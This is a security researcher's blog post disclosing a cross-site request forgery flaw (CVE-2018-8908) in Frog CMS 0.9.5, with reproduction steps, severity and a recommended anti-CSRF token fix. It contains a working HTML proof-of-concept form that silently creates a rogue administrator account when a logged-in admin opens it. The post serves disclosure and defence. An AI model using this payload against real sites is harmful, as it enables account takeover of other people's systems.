Cross Site Request Forgery- Frog CMS CVE ID : CVE-2018-8908

Cross Site Request Forgery- Frog CMS

By- Samrat Das

Hi Readers,

Recently while performing some open source security assessment, I came across an CMS Application, “Frog CMS” . Curious to explore its functionalities, I set up a local copy and started playing around to find security vulnerabilities’.

Title of the Vulnerability:  Cross Site Request Forgery

Vulnerability Class: Code Execution/ Privilege Escalation

Technical Details & Description: The application source code is coded in a way which allows malicious HTML request to be executed without veryifying source of request.This leads to arbitary execution with malicous request which will lead to the creation of a privileged user.

CVE ID allocated: -  CVE-2018-8908


Product & Service Introduction: Frog CMS

Steps to Re-Produce
1.       Visit the application
2.       Visit the Add Users Page.
3.       Craft an html page with all the details for an admin user creation and host it on a server
4.       Upon the link being clicked by a logged in admin user, immidiately, another admin user will get created.

Exploitation Technique: A attacker can create a rogue admin user to gain access to the application.

Severity Level: High

Security Risk:
The presence of such a risk can lead to user data compromise as well as privileged user access.
Exploit code:
<html>
  <body>
    <form action="http://localhost/frog/admin/?/user/add" method="POST">
      <input type="hidden" name="user&#91;name&#93;" value="Test&#95;1" />
      <input type="hidden" name="user&#91;email&#93;" value="" />
      <input type="hidden" name="user&#91;username&#93;" value="test" />
      <input type="hidden" name="user&#91;password&#93;" value="test" />
      <input type="hidden" name="user&#91;confirm&#93;" value="test" />
      <input type="hidden" name="user&#95;permission&#91;administrator&#93;" value="1" />
      <input type="hidden" name="commit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affected Product Version: Frog CMS  0.9.5

Solution - Fix & Patch: The application code should be configured to implement anti csrf token to filter malicous HTTP Requests.


POCs:




Comments

Popular posts from this blog

Stored XSS in Wonder CMS- CVE-2017-14522

Host Header Injection In Wonder CMS - CVE-2017-14523

Cross Site Request Forgery- Intex Router N-150 | CVE-2018-12529